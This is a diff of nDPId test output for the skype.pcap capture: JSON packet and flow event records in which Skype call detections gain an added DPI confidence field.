 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1nZ0AAEARXdnAqAEib91NmjLdnFEAIcopnHYCxd71ZoU+BTO6L2LN9kiyomjWgPGl4A=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA16v8AAEARrgrAqAEinTeCrDLdnFMAIRT0nHgCu2bzH4JB7obGwPAa3nMCpmcjtPyNNg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8hr8AAEAReCLAqAEib91KKDLdnFIAKIqNnHoCPuiFRI7wAmsXvw\/hsEg3lYrpYaj71nbGjF\/D9YI="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqeAAAEARTU7AqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQlQAAEARtNrAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -633,40 +633,40 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9kPYAAEARbgbAqAEib91KDDLdnF8AKfx\/nHwCoMStpaQYl8DnkwYEqqAF9FXdbHxKRUYHrOVyJRT4"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAc7wAAEARJVPAqAEinTeCnDLdnGIALEvBnH4CZ\/Wwkka3Pn+XJ2UB3JhFKbNG53SJ0IkPRrwOiZA6M572"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431969685484,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969685484,"pkt":"0NQSxnP1PBXCt3IOCABFAAA72\/8AAEARIuzAqAEib91KHzLdnFUAJxsjnIACakgRW6zNH9umAy\/xnD4EBConFfeCu32RWyeo5A=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1431969685579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969685579,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzugAAEARKEbAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1431969685579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969685579,"pkt":"0NQSxnP1PBXCt3IOCABFAABLSKwAAEARroLAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431969686494,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969686494,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7KdYAAEAR1RfAqAEib91KHTLdnFgAJyRCnIIC1fLHUFbyfUuPJFSEHOCi7XP7hf4fCpbSA7AYcw=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431969686494,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969686494,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+wC0AAEAR2OzAqAEinTeCkzLdnFMAKhU5nIQCbtjtgTR5b1SpAOgeT3hZ1sNas6z5WpsHwiEzG2Fdeg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 01115{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1431969686726,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969686726,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAIS0J4AAEAR5nLAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 01111{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1431969686726,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969686726,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISl+cAAEARXILAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
